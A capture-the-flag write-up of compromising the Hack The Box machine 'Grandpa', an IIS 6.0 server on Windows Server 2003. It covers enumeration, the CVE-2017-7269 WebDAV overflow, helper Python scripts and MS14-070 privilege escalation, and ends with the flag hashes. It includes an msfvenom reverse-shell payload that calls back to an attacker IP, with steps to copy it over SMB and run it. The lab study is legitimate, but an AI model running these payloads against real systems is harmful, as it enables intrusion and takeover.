Grandpa - 12.08.2021


NMap

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -T4 -p- 10.10.10.14
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-12 14:51 CEST
Nmap scan report for 10.10.10.14
Host is up (0.073s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   WebDAV type: Unknown
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Thu, 12 Aug 2021 13:05:01 GMT
|   Server Type: Microsoft-IIS/6.0
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

DavTest

┌──(kali㉿kali)-[~/htb/grandpa]
└─$ davtest -url http://10.10.10.14
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://10.10.10.14
********************************************************
NOTE    Random string for this session: nBfWUYy
********************************************************
 Creating directory
MKCOL           FAIL
********************************************************
 Sending test files
PUT     cgi     FAIL
PUT     jsp     FAIL
PUT     txt     FAIL
PUT     jhtml   FAIL
PUT     html    FAIL
PUT     cfm     FAIL
PUT     pl      FAIL
PUT     shtml   FAIL
PUT     php     FAIL
PUT     aspx    FAIL
PUT     asp     FAIL

********************************************************
/usr/bin/davtest Summary:

The target is Windows Server 2003 (IIS 6.0 is the Server 2003 release of IIS; the systeminfo output below confirms it).

The davtest failures are expected: PUT and MKCOL appear in the Public header but not in the Allow list nmap reported, so WebDAV uploads are refused. PROPFIND is allowed, however, and that is the vector for CVE-2017-7269: a buffer overflow in ScStoragePathFromUrl in the IIS 6.0 WebDAV component, triggered by a PROPFIND request whose If: header carries an overlong <http://...> URL, giving code execution in the IIS worker process. Windows Server 2003 left support in July 2015, before the bug was disclosed, so no vendor patch exists for this host. Public exploit:

https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269
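
Added example (not code from the original write-up or from the linked exploit): a small OPTIONS fingerprinter that reads the same Public and Allow headers nmap's http-webdav-scan and davtest act on, and turns them into the two conclusions above (PROPFIND reachable on IIS 6.0, uploads refused). The sample headers are constructed from the nmap output for 10.10.10.14; a live host is only contacted when a hostname is given on the command line.

```python
"""Added example (not from the original write-up): read an OPTIONS response the
way nmap's http-webdav-scan and davtest do, and explain the results above.
SAMPLE_HEADERS is constructed from the nmap output for 10.10.10.14; a live
target is only contacted when a hostname is passed on the command line."""
import http.client
import sys
from dataclasses import dataclass

# Methods davtest needs for its upload tests (MKCOL for the directory, PUT for files).
UPLOAD_METHODS = {"PUT", "MKCOL"}


@dataclass
class DavFingerprint:
    server: str   # Server header
    public: set   # Public header: methods the server implements
    allow: set    # Allow header: methods permitted on the requested resource


def _method_set(value):
    return {m.strip().upper() for m in value.split(",") if m.strip()}


def parse_options_headers(headers):
    """headers: list of (name, value) pairs as http.client's getheaders() returns them."""
    h = {name.lower(): value for name, value in headers}
    return DavFingerprint(
        server=h.get("server", ""),
        public=_method_set(h.get("public", "")),
        allow=_method_set(h.get("allow", "")),
    )


def assess(fp):
    """Return a list of findings; an empty list means nothing of interest."""
    findings = []
    # CVE-2017-7269 needs PROPFIND to reach the overflow in ScStoragePathFromUrl.
    if fp.server.lower().startswith("microsoft-iis/6.0") and "PROPFIND" in fp.allow:
        findings.append("CVE-2017-7269 candidate: IIS 6.0 with PROPFIND allowed")
    # Advertised in Public but absent from Allow: uploads will fail, as davtest showed.
    refused = (fp.public - fp.allow) & UPLOAD_METHODS
    if refused:
        findings.append("upload methods advertised but not allowed: " + ", ".join(sorted(refused)))
    granted = fp.allow & UPLOAD_METHODS
    if granted:
        findings.append("upload methods allowed (try davtest/PUT): " + ", ".join(sorted(granted)))
    return findings


def fetch_options(host, port=80, path="/", timeout=10):
    """Send OPTIONS to a live host and parse the reply."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("OPTIONS", path)
        return parse_options_headers(conn.getresponse().getheaders())
    finally:
        conn.close()


# Constructed sample: the headers nmap's http-webdav-scan reported for 10.10.10.14.
SAMPLE_HEADERS = [
    ("Date", "Thu, 12 Aug 2021 13:05:01 GMT"),
    ("Server", "Microsoft-IIS/6.0"),
    ("Public", "OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
               "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH"),
    ("Allow", "OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK"),
]

if __name__ == "__main__":
    fp = fetch_options(sys.argv[1]) if len(sys.argv) > 1 else parse_options_headers(SAMPLE_HEADERS)
    print("Server:", fp.server)
    for finding in assess(fp):
        print("[!]", finding)
```

Run it with no arguments to see the verdict for the recorded headers, or with a hostname to query a box directly. The Allow header is per resource, so a directory other than / may permit a different set; davtest only ever tries the URL it is given.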

systeminfo

Host Name:                 GRANPA
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          HTB
Registered Organization:   HTB
Product ID:                69712-296-0024942-44782
Original Install Date:     4/12/2017, 5:07:40 PM
System Up Time:            0 Days, 0 Hours, 18 Minutes, 10 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     1,023 MB
Available Physical Memory: 795 MB
Page File: Max Size:       2,470 MB
Page File: Available:      2,329 MB
Page File: In Use:         141 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A


Transferring files over SMB (the target has no wget or curl)

On Kali: build the payload into the directory that will be exported, then share that directory under the name "smb" (Server 2003 speaks SMB1, so the default impacket-smbserver settings are enough):

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.19 lport=9003 -f exe > www/shell.exe
impacket-smbserver smb www/

A multi/handler for windows/meterpreter/reverse_tcp on 10.10.14.19:9003 has to be listening in msfconsole before the payload is started.

On the target (cmd.exe from the CVE-2017-7269 shell; \windows\temp\pp must already exist and start is run from that directory):

copy \\10.10.14.19\smb\shell.exe \windows\temp\pp\shell.exe

start shell.exe

Privilege Escalation

msfconsole

The systeminfo output lists a single legacy hotfix (Q147222) on Server 2003 SP2, so the kernel is unpatched. MS14-070 (CVE-2014-4076, an IOCTL handling flaw in tcpip.sys on Windows Server 2003) is a local elevation of privilege from the meterpreter session to SYSTEM; Metasploit carries it as exploit/windows/local/ms14_070_tcpip_ioctl, and the standalone exploit is:

https://www.exploit-db.com/exploits/35936
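
Added example (not code from the original write-up): the check behind choosing MS14-070, as a parser for systeminfo output that reports local privilege-escalation bulletins whose fix is not installed. SAMPLE is a constructed excerpt of the systeminfo listing from this host; the bulletin table is a short hand-made list built from the public bulletin KB numbers (assumption: you extend it with the bulletins you care about), and the file-reading path assumes the output was saved as plain text.

```python
"""Added example (not from the original write-up): parse systeminfo output and
list local privilege-escalation bulletins whose KB is missing. SAMPLE is a
constructed excerpt of this host's systeminfo; LOCAL_PRIVESC is a deliberately
short table (assumption: extend it with the bulletins you need)."""
import re

# Bulletin -> (KB that fixes it, NT version prefix it applies to, note)
LOCAL_PRIVESC = {
    "MS14-070": ("KB2989935", "5.2", "tcpip.sys IOCTL EoP (CVE-2014-4076), exploit-db 35936"),
    "MS14-058": ("KB3000061", "5.2", "win32k.sys EoP (CVE-2014-4113)"),
    "MS15-051": ("KB3045171", "5.2", "win32k.sys EoP (CVE-2015-1701)"),
}

# Constructed excerpt of the systeminfo output shown above.
SAMPLE = """\
Host Name:                 GRANPA
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
Page File: Max Size:       2,470 MB
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A
"""

FIELD_RE = re.compile(r"^(\S.*?):\s{2,}(.*)$")       # "Key:<2+ spaces>value"
ITEM_RE = re.compile(r"^\s+\[\d+\]:\s*(\S.*?)\s*$")  # "   [01]: value" continuation line


def parse_systeminfo(text):
    """Return a dict of systeminfo fields plus a 'hotfixes' list of installed IDs."""
    info = {"hotfixes": []}
    current = None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            current = m.group(1)
            info[current] = m.group(2).strip()
            continue
        m = ITEM_RE.match(line)
        # Continuation lines also follow Processor(s); only keep the hotfix ones.
        if m and current == "Hotfix(s)":
            info["hotfixes"].append(m.group(1).upper())
    return info


def missing_patches(info, table=LOCAL_PRIVESC):
    """Bulletins that apply to this NT version and whose KB is not installed."""
    version = info.get("OS Version", "").split(" ")[0]   # e.g. "5.2.3790"
    installed = set(info["hotfixes"])
    return {
        bulletin: note
        for bulletin, (kb, prefix, note) in table.items()
        if version.startswith(prefix) and kb not in installed
    }


if __name__ == "__main__":
    import sys
    # Assumption: a saved "systeminfo > out.txt" in a plain 8-bit code page.
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE
    info = parse_systeminfo(text)
    print(info["OS Name"], "/", info["OS Version"])
    print("hotfixes:", ", ".join(info["hotfixes"]) or "none")
    for bulletin, note in missing_patches(info).items():
        print(f"[!] {bulletin} unpatched: {note}")
```

Against the sample every entry in the table comes back unpatched, which is the state this box is in; a host that has KB2989935 installed drops MS14-070 from the list. The version prefix keeps a Server 2003 bulletin from being reported against a 6.x kernel.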

user.txt

bdff5ec67c3cff017f2bedc146a5d869

root.txt

9359e905a2c35f861f6a57cecf28bb7b